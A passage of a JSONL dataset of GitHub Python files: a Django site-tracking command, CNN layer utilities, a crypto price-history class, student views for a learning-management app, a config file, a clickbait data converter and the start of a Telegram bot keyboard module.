file'),\n )\n\n def open_file(self, filename):\n # Open a file\n self.stdout.write(\"Opening file {}\".format(filename))\n if not os.path.exists(filename):\n self.stdout.write(\"Filename {} does not exist\".format(filename))\n return\n\n fo = open(filename, \"r+\")\n self.stdout.write(\"Name of the file: {}\".format(filename))\n lines = fo.readlines()\n fo.close()\n\n for line in lines:\n if ('www' in line or 'http' in line) and ' ' in line:\n self.stdout.write(\"{}URL is OK to track\".format(line))\n pass\n else:\n import pdb\n pdb.set_trace()\n self.stdout.write(\"{} is not a proper \"\n \"line with site url\".format(line))\n continue\n\n site_name, content_requirement = line.split(\" \")\n self.stdout.write(\"site_name : {},\"\n \"criteria : {}\".format(site_name,\n content_requirement))\n sites = TrackedSite.objects.get_or_create(\n name=site_name,\n content_requirement=content_requirement)\n\n def handle(self, *args, **options):\n if options['file']:\n self.open_file(options['file'])\n else:\n default_file = 'sites.txt'\n self.stdout.write(\"Opening default configuration file {}\".format(\n default_file))\n self.open_file('sites.txt')\n","repo_name":"tomaszd/turbo-check","sub_path":"blstream/monitor_project/monitor/management/commands/add_sites.py","file_name":"add_sites.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2558285965","text":"from .layers import *\nfrom cs231n.fast_layers import *\nfrom nndl.conv_layers import *\n\n\"\"\" \nThis code was originally written for CS 231n at Stanford University\n(cs231n.stanford.edu). It has been modified in various areas for use in the\nECE 239AS class at UCLA. This includes the descriptions of what code to\nimplement as well as some slight potential changes in variable names to be\nconsistent with class nomenclature. We thank Justin Johnson & Serena Yeung for\npermission to use this code. To see the original version, please visit\ncs231n.stanford.edu. \n\"\"\"\n\ndef affine_relu_forward(x, w, b):\n \"\"\"\n Convenience layer that performs an affine transform followed by a ReLU\n\n Inputs:\n - x: Input to the affine layer\n - w, b: Weights for the affine layer\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n \"\"\"\n a, fc_cache = affine_forward(x, w, b)\n out, relu_cache = relu_forward(a)\n cache = (fc_cache, relu_cache)\n return out, cache\n\n\ndef affine_relu_backward(dout, cache):\n \"\"\"\n Backward pass for the affine-relu convenience layer\n \"\"\"\n fc_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dx, dw, db = affine_backward(da, fc_cache)\n return dx, dw, db\n\n\n\n\ndef conv_batchnorm_relu_pool_forward(x, w, b, conv_param, pool_param, gamma, beta, bn_param):\n out, conv_cache = conv_forward_fast(x, w, b, conv_param)\n out, bn_cache = spatial_batchnorm_forward(out, gamma, beta, bn_param)\n out, relu_cache = relu_forward(out)\n out, pool_cache = max_pool_forward_fast(out, pool_param)\n\n cache = (conv_cache, bn_cache, relu_cache, pool_cache)\n return out, cache\n\ndef conv_batchnorm_relu_pool_backward(dout, cache):\n conv_cache, bn_cache, relu_cache, pool_cache = cache\n dout = max_pool_backward_fast(dout, pool_cache)\n dout = relu_backward(dout, relu_cache)\n dout, dgamma, dbeta = spatial_batchnorm_backward(dout, bn_cache)\n dx, dw, db = conv_backward_fast(dout, conv_cache)\n\n return dx, dw, db, dgamma, dbeta","repo_name":"Ji-Keyu/CNN-with-numpy","sub_path":"nndl/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30942197747","text":"from datetime import datetime, date\nimport json\nfrom Historic_Crypto import HistoricalData\n\nONE_DAY = 86400\nONE_HOUR = 3600\nFILE_FORMAT = '{currency_pair}_{interval}_data.json'\n\n\nclass PriceHistory:\n def __init__(self, currency_pair, interval, start='2017-01-01-00-00'):\n # new = HistoricalData('BTC-USD',86400,'2017-01-01-00-00').retrieve_data()\n self.currency_pair = currency_pair\n self.interval = interval\n self.date_format = self._date_format_for_interval(interval)\n self.history_dict = self._get_history(currency_pair, interval, start)\n\n def __getitem__(self, date):\n return self.history_dict[date.strftime(self.date_format)]\n\n def __setitem__(self, date, price):\n self.history_dict[date.strftime(self.date_format)] = price\n\n def _date_format_for_interval(self, interval):\n if interval == ONE_DAY:\n date_format = '%Y-%m-%d'\n elif interval == ONE_HOUR:\n date_format = '%Y-%m-%d,%H:00:00'\n else:\n raise Exception('Unsupported interval')\n return date_format\n\n def _get_history(self, currency_pair, interval, start):\n path_name = FILE_FORMAT.format(currency_pair=currency_pair, interval=interval)\n try:\n with open(path_name) as f:\n print('Using saved data')\n history_dict = json.load(f)\n except FileNotFoundError:\n print('No save data found\\nPulling data...')\n dat = HistoricalData(currency_pair, interval, start).retrieve_data()\n hist = {}\n for index, row in dat.iterrows():\n hist[row.name.strftime(self.date_format)] = row['close']\n self._save_history(hist, path_name)\n history_dict = hist\n return history_dict\n\n def _save_history(self, history, path_name):\n with open(path_name, 'w') as fp:\n json.dump(history, fp)\n","repo_name":"kperilla/CryptoGainsTracker","sub_path":"src/price_history.py","file_name":"price_history.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10736383616","text":"from django.http import JsonResponse,HttpResponse\nfrom django.shortcuts import redirect, render, redirect\nfrom django.contrib.auth import get_user_model\nfrom apps.sitlms_app.models import Course_Enrollment, Students_Auth, Student_Enrollment, Student_Profile, Program, Course_Catalog,Instructor_Auth, SubmitIssue, Schedule, Notification\nfrom django.conf import settings\nimport os,json\nfrom apps.sitlms_instructor.models import Activity_Comments, ActivityPrivateComments, Course_Activity\nfrom django.core.exceptions import PermissionDenied\nfrom django.contrib.auth.decorators import user_passes_test\nfrom apps.sitlms_student.forms import ActivitySubmissionUploadForm\nfrom apps.sitlms_student.models import Activity_Submission\nfrom django.utils import timezone\nfrom datetime import datetime, timedelta, date as date2\nfrom django.contrib.auth.models import User\nfrom apps.sitlms_instructor.models import Course_Announcement\nfrom operator import itemgetter\nfrom calendar import monthcalendar\nimport calendar\nfrom django.template.loader import render_to_string\nfrom dateutil.relativedelta import relativedelta\nfrom django.contrib import messages\nimport re\n# Create your views here.\n\ndef is_student(user):\n try:\n if hasattr(user,'students_auth'):\n return True\n raise PermissionDenied\n except Exception as e:\n raise PermissionDenied\n \ndef is_correct_student_cbatch_id(student, cbatch_id):\n try:\n # print(student)\n # print(Student_Enrollment.objects.filter(course_batch=cbatch_id).values('student_id'))\n # print('-')\n if Student_Enrollment.objects.filter(course_batch=cbatch_id, student_id=student).exists():\n pass\n else:\n return True\n except Exception as e:\n return True\n\n@user_passes_test(is_student) \ndef custom_403_2(request):\n # Pag pinasa ko with status=403, ayaw magload ng page :(\n # Dapat ganito: render(request, 'custom_403_1.html', status=403)\n return render(request, 'custom_403_2.html')\n\n\n\n@user_passes_test(is_student) \ndef student_view_course(request,id):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n\n \"\"\"This function displays the announcements, students, and additional information per course enrolled of the user\"\"\"\n\n course_batch = id\n user = request.user\n query = get_user_model().objects.filter(id=user.id)\n user_id = query.first().id\n\n \"\"\"Details for Announcement Section\"\"\"\n announcement_details = Course_Announcement.objects.filter(course_batch = id).order_by(\"-date_posted\").values()\n\n \"\"\"Details for Course Info Section\"\"\"\n course_details = Course_Enrollment.objects.filter(course_batch=id).values()\n instructor_id = course_details[0]['instructor_id_id']\n instructor_details = Instructor_Auth.objects.get(id=instructor_id)\n instructor_name = f\"{instructor_details.user.first_name} {instructor_details.user.last_name}\"\n \n\n \n \"\"\"Details for Classmates Section\"\"\"\n student_ids_enrolled = Student_Enrollment.objects.values_list('student_id').filter(course_batch=id)\n student_details = Students_Auth.objects.filter(id__in=student_ids_enrolled).exclude(user_id=user_id).values().order_by('id')\n program_ids = student_details.values_list('program_id_id')\n program_code = Program.objects.filter(program_id__in=program_ids).values()\n\n count = len(student_details)\n complete_student_details = list()\n for x in range(count):\n for program in program_code:\n if student_details[x]['program_id_id'] == program['program_id']:\n name = Students_Auth.objects.get(id=student_details[x]['id'])\n student_full_name = {'full_name':f\"{name.user.first_name} {name.user.last_name}\", 'last_name':name.user.last_name}\n complete_student_details.append({**student_details[x], **program, **student_full_name})\n\n complete_student_details = sorted(complete_student_details, key=itemgetter('last_name'))\n enrolled_class = Student_Enrollment.objects.filter(course_batch=id)\n # print(enrolled_class)\n class_details = Course_Activity.objects.filter(course_batch=id)\n details_expanded = []\n for act in class_details:\n if Activity_Submission.objects.filter(course_activity=act,student_id=request.user.students_auth).exists():\n grade = Activity_Submission.objects.get(course_activity=act,student_id=request.user.students_auth).grade\n if grade is None:\n grade = 'Not graded yet'\n else:\n grade = 'Not handed in'\n details_expanded.append({'act':act,'grade':grade})\n context={\n 'course_batch': course_batch,\n 'announcement_details':announcement_details,\n 'course_details':course_details,\n 'classmate_details':complete_student_details,\n 'instructor_name':instructor_name,\n 'class':enrolled_class,\n 'details':details_expanded,\n 'id':id,\n }\n return render(request,'student_module/view_courses.html',context)\n\n# def student_edit_profile(request):\n \n# \"\"\" This function renders the student edit profile\"\"\"\n# user = request.user\n# query = get_user_model().objects.filter(id=user.id)\n# user_id = query.first().id\n# student_id = Students_Auth.objects.get(user=user_id)\n# student_courses = Student_Enrollment.objects.filter(student_id=student_id).values()\n# enrolled_courses = Student_Enrollment.objects.filter(student_id=student_id).count\n# # print(student_courses)\n \n\n# context = {\n# 'stud_id':student_id,\n# 'course_count':enrolled_courses,\n# 'course_enrolled_list':student_courses,\n\n# }\n# return render(request, 'student_module/edit_profile.html',context)\n\n\n\n \n \n \n\n\"\"\"no need na to since nasa loob na ng edit_student_profile yung pagccreate ng folder\"\"\"\n# def create_student_photo_folder():\n \n# \"\"\" This function will create the folder for student profile pic storage\"\"\"\n \n# folder_path = os.path.join(settings.MEDIA_ROOT, 'student_photo')\n# if not os.path.exists(folder_path):\n# os.makedirs(folder_path)\n \n@user_passes_test(is_student) \ndef student_profile(request): \n \n \"\"\" This function renders the student page \"\"\"\n\n with open('./static/holidays.json', 'r') as openfile:\n sample_holiday_list = json.load(openfile)\n \n user = request.user\n queryset = get_user_model().objects.filter(id=user.id)\n user_id = queryset.first().id\n\n #adds notif counts\n notifs =Notification.objects.filter(is_read=False, recipient_id=user_id).order_by('-timestamp').values()\n count_notifs = notifs.count()\n\n\n student_auth_details = Students_Auth.objects.get(user_id=user_id)\n\n courses = Student_Enrollment.objects.filter(student_id=student_auth_details).values()\n enrolled_courses = Student_Enrollment.objects.filter(student_id=student_auth_details).count\n\n program_id = student_auth_details.program_id_id\n program = Program.objects.get(program_id=program_id)\n \n ongoing_count = Student_Enrollment.objects.filter(student_id=student_auth_details, status='Ongoing').count()\n completed_count = Student_Enrollment.objects.filter(student_id=student_auth_details, status='Completed').count()\n total_count = ongoing_count + completed_count\n \n ongoing_enrollments = Student_Enrollment.objects.filter(student_id=student_auth_details, status='Ongoing')\n # for enrollment in ongoing_enrollments:\n # print(f\"Enrollment ID {enrollment.enrollment_id}, Course Batch: {enrollment.course_batch}\")\n \n ## Schedule\n student_id = Students_Auth.objects.get(user=user_id)\n student_courses = Student_Enrollment.objects.filter(student_id=student_id).values()\n enrolled_courses = Student_Enrollment.objects.filter(student_id=student_id).count\n\n course_batch_list = student_courses.values_list('course_batch_id') # get course_batch\n # get course details using course_batch\n course_details = Course_Enrollment.objects.filter(course_batch__in=course_batch_list).values()\n # course_details = [x for x in course_details] # convert query set to list\n course_detail_list = []\n detail_count = len(course_details)\n\n # get course title and course description\n course_ids = Course_Enrollment.objects.filter(course_batch__in=course_batch_list).values('course_id_id')\n course_desc = Course_Catalog.objects.filter(course_id__in=course_ids).values()\n\n\n # sa may color ng calendar.html change\n sample_colors = [\n \"#800000\" , \"#722F37\", \"#800020\", \"#C8385A\", \"#7B0000\", \"#B03060\", \"#800000\", \"#800000\"\n ]\n\n\n event_list=[]\n\n for i in sample_holiday_list:\n item = {}\n item['start'] = str(i)\n item['title'] = sample_holiday_list[i]['description']\n item['color'] = '#1C0118' # holiday background color\n event_list.append(item)\n\n for x in range(detail_count):\n course_id = course_details[x]['course_id_id']\n course_batch = course_details[x]['course_batch']\n schedules = Schedule.objects.filter(course_batch=course_batch).values()\n instructor_id = course_details[x]['instructor_id_id']\n user_id = Instructor_Auth.objects.get(id=instructor_id).user_id\n firstname = User.objects.get(id=user_id).first_name\n lastname = User.objects.get(id=user_id).last_name\n\n start_time = course_details[x]['start_time']\n end_time = course_details[x]['end_time']\n\n for i in schedules:\n item = {}\n session_date_str = str(i['session_date'])\n if session_date_str in sample_holiday_list:\n continue\n item['start'] = datetime.combine(i['session_date'], start_time).isoformat()\n item['end'] = datetime.combine(i['session_date'], end_time).isoformat()\n item['fullname'] = f'{firstname} {lastname}'\n item['title'] = course_details[x]['course_batch']\n item['course_id'] = course_details[x]['course_id_id']\n item['full_desc'] = Course_Catalog.objects.get(course_id = course_id).course_desc # add course desc to dictionary\n item['url'] = course_details[x]['session_details'].lower()\n item['course_batch'] = course_batch\n\n try:\n item['color'] = sample_colors[x]\n except:\n item['color'] = '#A7000'\n\n event_list.append(item)\n\n \n \"\"\" Adding Course Desc and Course Title in Context\"\"\"\n for item in course_desc:\n if course_details[x]['course_id_id'] == item['course_id']:\n course_detail_list.append({**course_details[x], **item})\n\n student_details ={ 'first_name':student_auth_details.user.first_name, \n 'last_name':student_auth_details.user.last_name,\n 'program_title':program.program_title,\n 'ongoing_count':ongoing_count,\n 'completed_count':completed_count,\n 'total_count':total_count, \n }\n\n # # Get the current date from the URL parameters\n # date_str = request.GET.get('date', datetime.now().strftime('%Y-%m-%d'))\n # date = datetime.strptime(date_str, '%Y-%m-%d')\n\n # # Calculate the previous and next month values\n # prev_month = date - relativedelta(months=1)\n # next_month = date + relativedelta(months=1)\n\n # prev_date = prev_month.replace(day=1).strftime('%Y-%m-%d')\n # next_date = next_month.replace(day=1).strftime('%Y-%m-%d')\n\n # # Generate the calendar data for the specified month\n # cal = calendar.monthcalendar(date.year, date.month)\n\n # # Get the current month's name and year\n # month_name = date.strftime('%B')\n # year = date.year\n\n\n # for i in event_list:\n # print(i)\n # print(\"---\")\n \n \n # Render the calendar template with the calendar data, navigation parameters, month name/year, and events\n return render(request, 'student_module/student.html', {\n # 'prev_date': prev_date,\n # 'next_date': next_date,\n # 'month_name': month_name,\n # 'year': year,\n 'student_details': student_details,\n 'course_enrolled_list':courses,\n 'stud_id':user_id,\n 'course_count':enrolled_courses,\n 'scheduled_course':course_detail_list,\n 'event_list':json.dumps(event_list),\n 'notifs': notifs,\n 'count_notifs': count_notifs\n })\n # Render the calendar template with the calendar data, navigation parameters, month name/year, and events\n return render(request, 'student_module/student.html',context)\n\n\n\n\n\n@user_passes_test(is_student) \ndef student_view_assignment_details(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n user = request.user\n batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk)\n comment_items = Activity_Comments.objects.filter(course_activity=activity).order_by('timestamp')\n if activity.activity_attachment:\n file_relative_url = activity.activity_attachment.url \n file_url = request.build_absolute_uri(file_relative_url)\n else:\n file_url = False\n submission_grade = False\n submission_on_time = False\n private_comments = ActivityPrivateComments.objects.filter(course_activity=Course_Activity.objects.get(id=pk),student=request.user.students_auth,).order_by(\"timestamp\")\n if Activity_Submission.objects.filter(course_activity=activity,student_id=user.students_auth).values('activity_file').exists():\n submission_instance = Activity_Submission.objects.filter(course_activity=activity,student_id=user.students_auth).last()\n current_submission = submission_instance.activity_file\n initial_data = {'activity_file': current_submission}\n current_submission_filename = str(current_submission).split('/')[-1]\n # submission_upload_form = ActivitySubmissionUploadForm(initial=initial_data)\n #activity_file=current_submission\n submission_upload_form = ActivitySubmissionUploadForm()\n submission_grade = submission_instance.grade\n submission_on_time = True if submission_instance.date_submitted < activity.deadline else False\n # print(submission_instance.date_submitted)\n # print(activity.deadline)\n else:\n current_submission_filename = False\n submission_upload_form = ActivitySubmissionUploadForm()\n context = {\n 'batch':batch,\n 'act':activity,\n 'cmt':comment_items,\n 'file_url':file_url,\n 'user':user,\n 'submission_upload_form':submission_upload_form,\n 'current_submission_filename':current_submission_filename,\n 'submission_grade':submission_grade,\n 'submission_on_time': submission_on_time,\n 'private_comments':private_comments,\n }\n if request.method == \"POST\":\n msg = request.POST['msg_area']\n user = request.user\n comment = Activity_Comments(course_activity = activity, uid = user,content = msg, timestamp=timezone.now())\n comment.save()\n return redirect('student_view_assignment_details',id=id,pk=pk)\n \n return render(request, 'student_module/assignment_details.html',context)\n\n@user_passes_test(is_student) \ndef upload_activity_submission(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n # Will try one file upload muna \n student = request.user.students_auth\n # course_batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk)\n if request.method == 'POST':\n form = ActivitySubmissionUploadForm(request.POST, request.FILES)\n if form.is_valid():\n prev_instances=Activity_Submission.objects.filter(course_activity=activity,student_id=student)\n if prev_instances:\n for prev_i in prev_instances:\n file_path = prev_i.activity_file.path\n if os.path.isfile(file_path):\n os.remove(file_path)\n prev_instances.delete()\n attachment=request.FILES['activity_file']\n instance = Activity_Submission(course_activity=activity,student_id=student,activity_file=attachment, date_submitted=timezone.now())\n instance.save()\n return redirect('student_view_assignment_details',id=id,pk=pk)\n else:\n for x,y in form.errors.items():\n y=re.sub(\"<.*?>\", '', str(y))\n messages.error(request, y)\n return redirect('student_view_assignment_details',id=id,pk=pk)\n\n@user_passes_test(is_student) \ndef download_activity_attachment(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n # batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk) # Retrieve the object with the uploaded file\n\n # Perform any necessary checks or validations here\n\n # Retrieve the file path or file object from the model and open it\n file_path = activity.activity_attachment.path\n # print(file_path)\n file = open(file_path, 'rb')\n\n # Set the appropriate response headers\n filename=str(activity.activity_attachment.name).split('/')[-1]\n response = HttpResponse(file, content_type='application/octet-stream')\n response['Content-Disposition'] = f'attachment; filename=\"{filename}\"'\n\n return response\n\n@user_passes_test(is_student) \ndef download_activity_submission(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n student = request.user.students_auth\n course_batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk)\n submission = Activity_Submission.objects.filter(course_activity=activity,student_id=student).last()\n # print(submission)\n file_path = submission.activity_file.path\n # print(file_path)\n file = open(file_path, 'rb')\n\n # Set the appropriate response headers\n filename=str(submission.activity_file.name).split('/')[-1]\n response = HttpResponse(file, content_type='application/octet-stream')\n response['Content-Disposition'] = f'attachment; filename=\"{filename}\"'\n\n return response\n\n@user_passes_test(is_student) \ndef student_course_details(request):\n \n \"\"\" This function renders the student page course details \"\"\"\n \n return render(request, 'student_module/courses_details.html')\n\n\ndef edit_student_comment(request, id , pk, fk):\n batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk) \n comment_id = Activity_Comments.objects.get(id=fk)\n context = {\n 'batch':batch,\n 'act':activity,\n 'comment':comment_id,\n }\n if request.method == 'POST':\n person = request.POST['target']\n user = request.user\n msg = request.POST['txtmsg']\n comment_id.uid = user\n comment_id.content = msg\n comment_id.timestamp = timezone.now()\n comment_id.save(update_fields=['uid','content','timestamp'])\n return redirect('student_view_assignment_details', id=id,pk=pk)\n return render(request, \"student_module/edit_comments.html\", context)\n\ndef delete_student_comment(request, id, pk, fk):\n batch = Course_Enrollment.objects.get(pk=id)\n act= Course_Activity.objects.get(id=pk)\n comment_id = Activity_Comments.objects.get(id=fk)\n context = {\n 'batch':batch,\n 'act':act,\n 'comment':comment_id,\n 'id':id,\n }\n if request.method == 'POST':\n comment_id.delete()\n return redirect('student_view_assignment_details',id=id,pk=pk)\n return render(request, 'student_module/delete_comments.html',context)\n\n\n@user_passes_test(is_student) \ndef student_edit_profile(request):\n \n user = request.user\n queryset = get_user_model().objects.filter(id=user.id)\n user_id = queryset.first().id\n\n #adds notif counts\n notifs =Notification.objects.filter(is_read=False, recipient_id=user_id).order_by('-timestamp').values()\n count_notifs = notifs.count()\n\n \"\"\" This function renders the student edit profile\"\"\"\n student_auth_details = Students_Auth.objects.get(user_id=user_id)\n # print(student_auth_details.user_id, user_id)\n \n if user_id in Student_Profile.objects.values_list('user_id', flat=True):\n student_profile = Student_Profile.objects.get(user_id=user_id)\n student_profile.profile_pic = str(student_profile.profile_pic).replace(\"\\\\\",\"/\")\n student_profile.save()\n \n\n \n student_details ={ 'first_name':student_auth_details.user.first_name, \n 'middlename':student_auth_details.middlename,\n 'last_name':student_auth_details.user.last_name,\n 'birthdate':student_auth_details.birthdate,\n 'bio':student_profile.bio,\n 'address':student_profile.address,\n 'user_contact_no':student_profile.user_contact_no,\n 'emergency_contact':student_profile.emergency_contact,\n 'emergency_contact_no':student_profile.emergency_contact_no,\n 'profile_pic':student_profile.profile_pic,\n 'email': student_auth_details.user.username,\n 'emp_no': student_auth_details.student_no\n } \n \n else:\n student_details ={ 'first_name':student_auth_details.user.first_name, \n 'middlename':student_auth_details.middlename,\n 'last_name':student_auth_details.user.last_name,\n 'birthdate':student_auth_details.birthdate,\n 'bio':\"\",\n 'address':\"\",\n 'user_contact_no':\"\",\n 'emergency_contact':\"\",\n 'emergency_contact_no':\"\",\n 'profile_pic':\"\",\n 'email': student_auth_details.user.username,\n 'emp_no': student_auth_details.student_no\n } \n \n \n \n context = {'student_details': student_details,\n 'notifs': notifs,\n 'count_notifs': count_notifs\n }\n\n if request.method == 'POST':\n first_name = request.POST['first_name']\n middlename = request.POST['middlename']\n last_name = request.POST['last_name']\n birthdate = request.POST['birthdate']\n bio = request.POST['bio']\n address = request.POST['address']\n user_contact_no = request.POST['user_contact_no']\n emergency_contact = request.POST['emergency_contact']\n emergency_contact_no = request.POST['emergency_contact_no']\n \n \n profile_pic = False\n\n if 'profile_pic' in request.FILES:\n profile_picture = request.FILES['profile_pic']\n profile_pic = f\"{user_id}{os.path.splitext(profile_picture.name)[1]}\"\n\n\n if profile_pic:\n static_dirs = settings.STATICFILES_DIRS # Get the STATICFILES_DIRS list from Django settings\n student_pic_folder = os.path.join(static_dirs[0], 'student_pic')\n os.makedirs(student_pic_folder, exist_ok=True)\n\n file_path = os.path.join(student_pic_folder, profile_pic)\n \n with open(file_path, 'wb') as destination:\n for chunks in profile_picture.chunks():\n destination.write(chunks)\n\n\n\n student_auth_details.user.first_name = first_name\n student_auth_details.middlename = middlename\n student_auth_details.user.last_name = last_name\n student_auth_details.birthdate = birthdate\n\n if user_id in Student_Profile.objects.values_list('user_id', flat=True):\n # student_profile = Student_Profile.objects.get(user_id=user_id)\n # print(\"I entered in line 152\")\n student_profile.bio = bio\n student_profile.address = address\n student_profile.user_contact_no = user_contact_no\n student_profile.emergency_contact = emergency_contact\n student_profile.emergency_contact_no = emergency_contact_no\n\n # enters here if there is a record in student_profile, used only for updating profile pic\n if profile_pic:\n student_profile.profile_pic = str(os.path.join(settings.STATIC_URL, 'student_pic', profile_pic)).replace(\"\\\\\",\"/\")\n\n else:\n # enters here if there is no record yet in student_profile\n\n if profile_pic:\n student_profile = Student_Profile(\n bio=bio,\n address=address,\n user_contact_no=user_contact_no,\n emergency_contact=emergency_contact,\n emergency_contact_no=emergency_contact_no,\n user_id=user_id,\n profile_pic=str(os.path.join(settings.STATIC_URL, 'student_pic', profile_pic)).replace(\"\\\\\",\"/\")\n )\n else:\n student_profile = Student_Profile(\n bio=bio,\n address=address,\n user_contact_no=user_contact_no,\n emergency_contact=emergency_contact,\n emergency_contact_no=emergency_contact_no,\n user_id=user_id,\n profile_pic=os.path.join(settings.STATIC_URL, 'student/assets/imgs/profile.png')\n )\n\n \n student_profile.save()\n student_auth_details.user.save()\n student_auth_details.save()\n \n\n return redirect('/sit-student/student_profile')\n \n return render(request, 'student_module/edit_profile.html', context) \n\ndef report_issues(request):\n user = request.user\n queryset = get_user_model().objects.filter(id=user.id)\n user_id = queryset.first().id\n\n if request.method == \"POST\":\n student_report_issues = Students_Auth.objects.get(user_id=user_id)\n firstname = User.objects.get(id=user_id).first_name\n lastname = User.objects.get(id=user_id).last_name\n student_access = student_report_issues.access_type\n subject = request.POST['inputsubject']\n msg = request.POST['contact-message']\n\n issue = SubmitIssue(sender_firstname = firstname,sender_lastname = lastname,sender_access_type= student_access,sender_subject = subject,sender_message = msg)\n issue.save()\n #DEBUG\n # print(f'{firstname} | {lastname} | {student_access}')\n # print(f'{subject} \\n {msg}')\n return redirect('/sit-student/student_profile')\n\n@user_passes_test(is_student)\ndef add_private_comment_student(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n if request.method==\"POST\":\n instance = ActivityPrivateComments(course_activity=Course_Activity.objects.get(pk=pk),student=request.user.students_auth,uid=request.user,content=request.POST.get(\"comment_content\"))\n instance.save()\n return redirect('student_view_assignment_details', id=id,pk=pk)\n\n@user_passes_test(is_student)\ndef delete_private_comment_student(request, id, pk, comment_id):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n instance = ActivityPrivateComments.objects.get(pk=comment_id)\n if instance.uid != request.user:\n return redirect(\"student-no-access\")\n instance.delete()\n return redirect('student_view_assignment_details', id=id,pk=pk)\n\n\ndef read_notif(request, id):\n notifications = Notification.objects.get(id=id)\n notifications.is_read = True\n notifications.save()\n course_title = notifications.message.split()[3]\n full_name = notifications.message.split()[5:] #['Apolinario', 'Jaime','Mabini']\n last_name = full_name[-1] #Mabini\n first_name = ''.join(full_name[:-1]) #['Apolinario'm 'Jaime']\n instructor_id = User.objects.get(first_name=first_name, last_name=last_name).id\n instructor_id = Instructor_Auth.objects.get(user_id=instructor_id).id\n course_id = Course_Catalog.objects.get(course_title=course_title).course_id\n course_batch = Course_Enrollment.objects.get(course_id_id=course_id, instructor_id_id=instructor_id).course_batch\n\n if notifications.notif_type== \"Post Assignment\":\n return redirect(\"view_courses\", id=course_batch)\n \n # return redirect (\"student_profile\")","repo_name":"pamsacdalan/frontend","sub_path":"apps/sitlms_student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17217981657","text":"IDX_CLASS_LABELS = {\n 0: 'AnnualCrop',\n 1: 'Forest', \n 2: 'HerbaceousVegetation',\n 3: 'Highway',\n 4: 'Industrial',\n 5: 'Pasture',\n 6: 'PermanentCrop',\n 7: 'Residential',\n 8: 'River',\n 9: 'SeaLake'\n}\n\nPATH = 'C:/Users/aacer/PycharmProjects/PFE_IVA/river.jpg'\nMODEL_PATH = 'C:/Users/aacer/PycharmProjects/PFE_IVA/lulc_max_acc.pth'\nNUM_CLASSES = 10\n","repo_name":"AzzedineNed/Multispectral-Land-Cover-Classification","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"785562696","text":"import json\nimport pandas as pd\n\ndef cleanText(text):\n return text.replace('\\xa0', ' ')\n\ndef readFile(fileName):\n return tuple(open(fileName, 'r'))\n\ndef findById(id, array):\n for i in range(0, len(array)):\n if array[i][\"id\"] == id:\n return i\n return -1\n\ndef loadTruthFile(fileName):\n truth = []\n truthLines = readFile(fileName)\n for line in truthLines:\n lineJson = json.loads(line)\n id = lineJson[\"id\"]\n result = lineJson[\"truthClass\"]\n truth.append({\"id\": id, \"result\": result})\n return truth\n\ndef loadInstances(fileName, truth):\n allData = []\n instanceLines = readFile(fileName)\n for line in instanceLines:\n lineJson = json.loads(line)\n id = lineJson[\"id\"]\n truthId = findById(id, truth)\n if truthId == -1:\n print(\"id not found\")\n continue\n result = truth[truthId][\"result\"]\n title = cleanText(lineJson[\"targetTitle\"])\n keywords = cleanText(lineJson[\"targetKeywords\"])\n description = cleanText(lineJson[\"targetDescription\"])\n text = \"\"\n for par in lineJson[\"targetParagraphs\"]:\n text = text + (cleanText(par)+\"\\n\")\n text = text[:-1]\n allData.append({\"id\": id, \"result\": result, \"title\": title, \"keywords\": keywords, \"description\": description, \"text\": text})\n return allData\n\n\ntruth = loadTruthFile(\"truth.jsonl\")\nnews = loadInstances(\"instances.jsonl\", truth)\npd.DataFrame(news).to_csv('trainingDataSet.csv', index=False, header=False)\n\n","repo_name":"hasbisevinc/ClickBait-Detector","sub_path":"training/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"20838850955","text":"from aiogram.types import ReplyKeyboardMarkup, ReplyKeyboardRemove, KeyboardButton, InlineKeyboardMarkup, \\\n InlineKeyboardButton, CallbackQuery\nfrom aiogram.utils.keyboard import KeyboardBuilder, InlineKeyboardBuilder\nfrom mongo_db_op import database_operations\n\n\ndef get_notes_kb(username: str) -> InlineKeyboardMarkup:\n notes = database_operations.get_notes(username)\n builder = InlineKeyboardBuilder()\n\n for note in notes:\n builder.button(text=f\"📔{note['title']}\",\n callback_data=f\"note: {note['_id']}\")\n\n builder.button(text='âž•',\n callback_data='add_note_btn')\n builder.button(text='refresh',\n callback_data='refresh_btn')\n builder.button(text='search🔎',\n callback_data='search_note_btn')\n builder.adjust(1, True)\n markup = InlineKeyboardMarkup(inline_keyboard=builder.export())\n return markup\n\n\ndef get_note_operations_kb(note_id):\n ikb = InlineKeyboardMarkup(inline_keyboard=[\n 